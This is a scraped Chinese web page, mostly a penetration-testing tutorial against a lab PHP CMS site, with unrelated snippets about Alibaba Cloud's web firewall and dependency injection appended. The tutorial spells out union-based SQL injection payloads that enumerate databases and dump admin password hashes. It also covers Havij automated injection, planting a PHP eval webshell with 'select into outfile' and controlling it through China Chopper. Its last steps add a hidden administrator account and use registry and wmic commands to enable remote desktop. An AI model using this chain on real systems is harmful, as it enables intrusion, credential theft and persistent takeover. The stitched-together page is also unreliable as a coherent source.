精华内容
下载资源
问答
  • phpcms手工注入教程

    2018-10-24 11:25:55
    攻击机器:利用镜像win2k8创建主机,并作为攻击机 步骤: 一、靶机操作 1、进入靶机,查看IP地址; 开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig 显示,靶机配置信息,记下以太网适配器下,IPv4地址...

    目标服务器(靶机):192.168.1.27
    目标网站:http://192.168.1.27:8083
    步骤:

    一、靶机操作

    1、进入靶机,查看IP地址;

    开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig
    显示,靶机配置信息,记下以太网适配器下,IPv4地址(后面访问网页会用到)。
    此处为192.168.1.27

    2、启动phpstudy(桌面图标):

    在这里插入图片描述
    如果,显示不是两个绿色标志,则等待一会,按下重启按钮,再次尝试。

    二、远程攻击机操作

    1、打开攻击机

    利用攻击机,访问靶机。http://192.168.1.27:8083(注意根据查看到的靶机IP地址,修改此处的IP,端口不变,以下截图中,均应将端口修改为8083),然后点击其中的一篇文章,如果地址栏出现http://***/xx.php?id=XX,则表明目标网站,采用PHP语言开发。
    在这里插入图片描述

    2、试探目标网站

    分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。
    在这里插入图片描述
    如果单撇号出错、给出数据库信息,and 1=1正确执行,and 1=2显示空页面,则表明存在注入攻击点。

    在这里插入图片描述
    在这里插入图片描述

    三、手工注入

    非常重要:首先在网站找到管理入口,否则,呵呵就算有用户名和密码,没有入口,也是白玩。。

    注入时,注意通过改变大小写、编码、转换等方式躲过系统检查,顺利执行语句!!!

    步骤1:访问目标网站

    在这里插入图片描述
    随便点击其中一个新闻
    在这里插入图片描述

    步骤2:寻找注入点

    在 URL 后加’(单引号)判断是否存在注入点,数据库报错。
    在这里插入图片描述

    步骤3:判断字段长度:

    利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15
    在这里插入图片描述
    在这里插入图片描述

    步骤4:判断字段位置回显:

    利用 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 最后一个数为字段长度,有回显会将相应数字显示出来。从下图可知,3 和 11 的位置可以回显信息。判断数据库信息:
    在这里插入图片描述

    步骤5:判断数据库信息:

    利用 and 1=2 union select 1,2,sql_command,4,5,6,7,8,9,10,11,12,13,14,15 ,用 sql 指令替换 sql_command。
    Sql_command为以下参数:
    查看 mysql 版本 version()
    查看当前数据库 database()
    查看当前用户 user()

    1. 判断版本
      在这里插入图片描述

    2. 判断数据库
      在这里插入图片描述

    3. 判断用户
      在这里插入图片描述

    步骤6:判断mysql所有数据库:

    利用 and 1=2 union select 1,2,group_concat(convert(SCHEMA_NAME using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.SCHEMATA,查看 mysql中所有数据库的名称。
    由下图结果可知业务数据库为 cms。其他数据库有mysql,discuz,test等
    在这里插入图片描述

    步骤7:判断数据库表:

    利用 and 1=2 union select 1,2,group_concat(convert(table_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() ,查看 cms 数据库拥有的所有表。可以发现存放用户信息的表cms_users。=
    在这里插入图片描述

    步骤8:判断数据表的所有列:

    利用 and 1=2 union select 1,2,group_concat(convert(column_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x636D735F7573657273。
    table_name=cms_users,表名需要编码为 16 进制。得到 3 个列:userid,username 和 password
    从ASCII对照表中可知对应:c(63) m(6d) s(73) _(5f) u(75) s(73) e(65) r(72) s(73)
    在这里插入图片描述

    步骤9:判断管理员账号密码:

    利用 and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14,15 from cms.cms_users。得到管理员账号密码为:admin/e10adc3949ba59abbe56e057f20f883e(解密后123456)
    在这里插入图片描述
    登陆后台地址后台地址:http://192.168.1.27:8083/admin/login.php,SQL注入结束。
    在这里插入图片描述

    四、利用Havij进行自动化工具注入

    在桌面,运行Havij.exe。

    在这里插入图片描述
    在Target后面的输入栏中,输入看到的目标网站的可注入网址。

    注意:
    (1)Target栏目中,输入内容,必须带上“http://”,并且,一定具有****.php?id=**特征。
    (2)Database选择项,根据前面出错信息,自动检测。其他按图中所示进行选择即可。
    (3)点击,Analyze,即可输出各种信息。

    第一步:获取信息。点击info,查看基本信息。

    在这里插入图片描述

    第二步:获取数据库,表,列的信息。

    依次点击TablesàGetDBs,得到靶机上的所有数据库信息(如果仅显示一个数据库,等待1分钟左右,再次点击即可),勾选mysql数据库,然后点击Get Tables,得到mysql数据库中的所有表的信息。

    选择user、password列,点击Get Data得到当前数据库的用户名和密码加密后的值。

    在这里插入图片描述
    通过www.cmd5.com查询,得到对应的密码明文。
    Root

    第三步:登陆数据库

    利用拿到的mysql数据库用户名密码登录数据库管理端。(此处省去发现该端口过程,可利用指纹扫描软件发现PHPmyadmin的管理端口)
    访问http://192.168.1.27:8088/phpMyAdmin/,输入用户名密码,进入如下界面:
    在这里插入图片描述
    在数据库列表中,选中cms数据库。然后,在网页中部偏上位置,点击SQL,并执行SQL命令。
    select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘D:/WWW/cms/ma.php’
    注意:此处如果将/写为\将不能执行。

    在这里插入图片描述

    此处,写入的目录,需要不断进行试探。。
    网站根目录下面才是cms网站,所以此目录,对应的网址为:
    http://192.168.1.27:8083/ma.php,利用菜刀连接此地址。
    中国菜刀连接后,打开命令行界面:
    输入http://192.168.1.27:8083/ma.php 口令为cmd。
    在这里插入图片描述
    然后右键点击添加条目,选择文件管理,即可看到目标靶机的磁盘情况。

    在这里插入图片描述
    即可下载、上传、删除文件等。

    如果需要进行用户操作,则右键点击添加条目,选择虚拟终端,弹出类似DOS窗口的webshell。此窗口中可进行用户添加与权限提升。
    在这里插入图片描述
    打开虚拟终端后,执行net user,如果菜刀显示乱码,设置编码方式为GB2312即可。
    在这里插入图片描述

    以下操作,除非特殊说明,均在此webshell中进行。

    五、命令

    查看当前存在用户:
    net user
    查看当前用户组:
    net localgroup
    添加用户(以添加用户名username密码1234为例):
    net user username 1234 /add
    添加用户到组(以添加ls用户到Administrators组为例):
    net localgroup Administrators username /add
    查看用户组:
    net localgroup administrators
    即可看到所添加的用户,已经在管理员组了。

    为了便于操作,还可以开启远程桌面开启。
    如果,远程主机关闭了远程桌面功能,则有几种方法打开:在WEbshell窗口中,执行以下任一语句,即可远程打开远程桌面功能。

    (1)REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    (2)wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1

    (3)wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call setuserauthenticationrequired 1
    以上三种方法,第一种用于xp和win2003,后两者适用与win7、8.

    然后,然后,打开远程桌面,输入目标网站IP地址。

    利用刚才创建的用户名、密码登录了。
    可以查看文件,可以修改配置。
    下载文件,还要在菜刀中进行。

    本教程仅供网站进行渗透测试,请勿用于非法途径!!造成任何危害,均由个人负全责!!

    展开全文
  • SQL注入系列教程(6套),百度链接可用,友情分享。
  • 阿里大学课程:阿里Web应用防火墙使用教程 课程介绍: Web应用防火墙(Web Application Firewall, 简称 WAF), 是阿里基于10余年攻防经验完全自主研发的安全产品。其基于安全大数据能力实现,通过防御SQL注入...

    阿里云大学课程:阿里云Web应用防火墙使用教程

    课程介绍:

    Web应用防火墙(Web Application Firewall, 简称 WAF), 是阿里基于10余年攻防经验完全自主研发的安全产品。其基于云安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意访问,避免您的网站资产数据泄露,保障网站的安全与可用性。

    产品详情:https://www.aliyun.com/product/waf

    课时列表:

    课时1:Web应用防火墙-简介

    课时2:Web应用防火墙-接入使用

    课时3:精准访问控制功能使用介绍

    课时4:数据风控功能使用介绍

    课时5:CC自定义功能使用介绍

    开始学习:阿里云Web应用防火墙使用教程

    阿里云大学首页:阿里云大学

    展开全文
  • sqlmap注入

    2018-12-25 12:11:39
    sqlmap注入教程合辑,百度链接长期有效。
  • 云盾Web应用防火墙(Web Application Firewall, 简称 WAF)基于安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意CC攻击,...

    什么是云盾Web应用防火墙?
    云盾Web应用防火墙(Web Application Firewall, 简称 WAF)基于云安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意CC攻击,避免您的网站资产数据泄露,保障网站的安全与可用性。

    接入云盾Web应用防火墙的好处?
    无需安装任何软、硬件,无需更改网站配置、代码,它可以轻松应对各类Web应用攻击,确保网站的Web安全与可用性,淘宝天猫都在用。除了具有强大Web防御能力,还可以指定网站的专属防护,背后是大数据的安全能力。适用于在金融、电商、o2o、互联网+、游戏、政府、保险、政府等各类网站的Web应用安全防护上。

    如果缺少WAF,光靠前面提到的防护措施会存在短板,例如在面对如数据泄密、恶意CC、木马上传篡改网页等攻击的时候,就不能拿很好地防护了,可能会导致Web入侵。

    怎么接入云盾Web应用防火墙
    一、控制台配置。
    1、登录阿里云控制台,找到云盾 > Web应用防火墙 > 域名配置,点击添加域名按钮。
    在这里插入图片描述
    2、弹出的对话框中输入相关信息:
    在这里插入图片描述
    3、获取CNAME。配置好域名后,WAF会自动分配给当前域名一个CNAME,可点击域名信息来查看:在这里插入图片描述
    4、上传HTTPS证书和私钥(仅针对HTTPS站点)。如果防护HTTPS站点,必须上传服务器的证书和私钥到WAF,否则访问HTTPS站点会有问题。勾选HTTPS后,会看到红色的“异常”字样,提示当前证书有问题,点击上传证书来上传:
    在这里插入图片描述
    5、接入状态异常排查,刚添加完域名时,接入状态可能会提示异常。这是正常的,待修改DNS使用CNAME解析接入WAF后,或者是有正常流量经过WAF以后会变成正常的。
    在这里插入图片描述
    二、放行回源IP段
    在这里插入图片描述
    三、本地验证。
    1、以前面步骤中添加的域名以后,hosts文件应该添加如下内容,其中前面的IP地址为对应的WAFIP地址,WAF的IP可以通过ping提供的CNAME来获得。
    在这里插入图片描述
    2、修改hosts文件后保存。然后本地ping一下被防护的域名,预期此时解析到的IP地址应该是刚才绑定的WAF IP地址。如果依然是源站地址,可尝试刷新本地的DNS缓存(Windows的cmd下可以使用ipconfig/flushdns命令)。

    3、确认hosts绑定已经生效(域名已经本地解析为WAF的IP)后,打开浏览器,输入该域名进行访问,如果WAF的配置正确,网站预期能够正常打开。

    4、尝试一下手动模拟一些简单的web攻击命令,如www.aliyxxxx.cn/?alert(xss) 预期WAF能够弹出阻拦页面:
    在这里插入图片描述
    四、通过DNS供应商或者其他域名解析系统,修改DNS解析。
    阿里云给我们ECS实例的安全性提供了这么多的安全产品保驾护航,我们可以根据实际需要选择相应的产品,加强对系统和数据的防护,减少ECS实例接受到的侵害,使其稳定、持久地运行。

    更多参阅云栖社区-Web 应用防火墙

    展开全文
  • 平时常见的攻击网站手法比如 SQL 注入、XSS 跨站脚本等,还有常见 Web 服务器插件漏洞被利用、上传木马、攻击非授权核心资源访问等,web 应用防火墙都能够一一抵挡住。今天魏艾斯博客也是刚接触阿里 Web 应用...

    阿里云 web 应用防火墙是什么?简单说可以起到防护外部攻击、修补服务器漏洞,抵挡海量恶意 CC 攻击的作用,用于避免网站数据泄露,保障网站安全和使用。平时常见的攻击网站手法比如 SQL 注入、XSS 跨站脚本等,还有常见 Web 服务器插件漏洞被利用、上传木马、攻击非授权核心资源访问等,web 应用防火墙都能够一一抵挡住。今天魏艾斯博客也是刚接触阿里云 Web 应用防火墙,我们一起来学习如何使用。

    Web 应用防火墙支持对网站的 HTTP、HTTPS(高级版及以上)流量进行 Web 安全防护。主要适用于金融、电商、o2o、互联网+、游戏、政府、保险等行业各类网站的 Web 应用安全防护。

    一、开通 Web 应用防火墙服务

    1、登录阿里云官网,先点我领取阿里云千元代金券礼包,包括阿里云 100+产品,抵扣 50 元起。现在打开 Web 应用防火墙产品详情页。

    2、单击包年包月购买。

    3、在 Web 应用防火墙购买页面选择预付费(即包年包月)的购买方式,这样更便宜实惠。

    4、包年包月模式:选择地域,根据您的需求选择适合实际业务需求的套餐版本、扩展域名包、独享 IP 资源包、额外带宽扩展,设置购买时长,单击立即购买,并完成支付。

    二、将网站添加至 Web 应用防火墙实例

    1、登录云盾 Web 应用防火墙控制台,定位到管理 > 网站配置页面,根据您的 WAF 实例所在的地区,选择中国大陆或海外地区。

    2、如果要防护的网站域名使用阿里云云解析 DNS 进行解析,阿里云支持一键完成添加和解析配置,方便的很哟。否则就要手动添加网站,然后修改域名的 CNAME 解析记录,将网站域名解析到 WAF 实例。如果要防护的网站使用 HTTPS 协议,WAF 也支持相应配置,但必须在添加网站后上传证书和私钥,设置才能生效。

    3、单击添加网站,WAF 将自动列出当前阿里云账号在云解析 DNS 中添加过解析 A 记录的域名,勾选需要防护的域名及协议类型,单击立即防护即可将该网站域名添加至 WAF 实例。同时,WAF 将自动为您修改该域名的 DNS 解析记录,以接入该 WAF 实例进行防护。

    三、查看 Web 应用防火墙为该网站分配的 CNAME

    上面的网站配置成功添加到 WAF 后,自动为该域名分配一个 CNAME,把域名解析到这个 CNAME,这时候所有访问网站的请求就先经过 WAF 实例过滤,被转发至源站服务器,实现安全防护。

    四、上传 HTTPS 证书和私钥

    这个仅用于 HTTPS 站点。如果添加的网站支持 HTTPS 的 SSL 证书,且已勾选 HTTPS 协议类型,在添加网站配置后,还需要在云盾 Web 应用防火墙控制台上传相应的证书和私钥,否则无法通过 HTTPS 协议访问网站。

    经过上面一番设置 WAF 就正式部署到域名上面了,后面所有访问网站的流量都需要经过 WAF 的过滤,把恶意流量过滤掉,正常流量放行,这样就可以从网站入口就保障安全防护,所以叫阿里云盾,就像一个盾牌一样的挡住一切外部攻击。很多网站正在被攻击或打算购买防攻击服务的站长朋友们,先点我领取阿里云千元代金券礼包,包括阿里云 100+产品,抵扣 50 元起,再试试阿里云盾的 Web 应用防火墙,凭借阿里云在电商领域多年的防攻击经验,帮助你防住恶意 CC 攻击是很容易的。




    转载于:https://juejin.im/post/5c70f587f265da2dc0065a91

    展开全文
  • 云盾Web应用防火墙(Web Application Firewall, 简称 WAF)基于安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意CC攻击,...
  • ---- 网易热评一、环境:kali 2020.01,python2或python3二、命令介绍1、sqlmap --update 更新命令2、is-dba 查询是否是管理员权限sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" ...
  • 这个社会,最可悲的莫过于那些既...---- 网易热评一、Oracle数据库一般大型企业都会用到,物流、旅游、航空、银行等等。。。1、支持多用户、大事务量的处理2、数据安全性和完整性的有效控制3、支持分布式数据处理...
  • 这个社会,最可悲的莫过于那些既... ---- 网易热评一、Oracle数据库一般大型企业都会用到,物流、旅游、航空、银行等等。。。1、支持多用户、大事务量的处理2、数据安全性和完整性的有效控制3、支持分布式数据处...
  • 现在,ASP.NET MVC 6 支持注入类到视图中,和VC类不同的是,对类是公开的、非嵌套或非抽象并没有限制。在这个例子中,我们创建了一个简单的类,用于统计代办事件、已完成事件和平均优先级的服务。
  • 钱钟书在《围成》里写到:“约着见一面,就能使见面... ---- 网易热评一、网站分类1、静态网页html或者htm是静态页面,不需要服务器解析其中的脚本特点:不依赖数据库,灵活性差,制作、更新、维护麻烦,交互性差...
  • 钱钟书在《围成》里写到:“约着见一面,就能使见面...---- 网易热评一、网站分类1、静态网页html或者htm是静态页面,不需要服务器解析其中的脚本特点:不依赖数据库,灵活性差,制作、更新、维护麻烦,交互性差,...
  • 摘要现在,ASP.NET MVC 6 支持注入类到视图中,和VC类不同的是,对类是公开的、非嵌套或非抽象并没有限制。在这个例子中,我们创建了一个简单的类,用于统计×××事件、已完成事件和平均优先级的服务。ASP.NET5MVC6...
  • 依赖注入这个模式(模式已经用烂了,这里再烂一次)是用来给应用的各部分解耦的。使应用开发更加可扩展,更容易维护。...本教程会使用最新的Dagger2(当前的版本是2.2)。这里是官网。你可以在这里找到最新的发

空空如也

空空如也

1 2 3 4 5
收藏数 95
精华内容 38
关键字:

云注入教程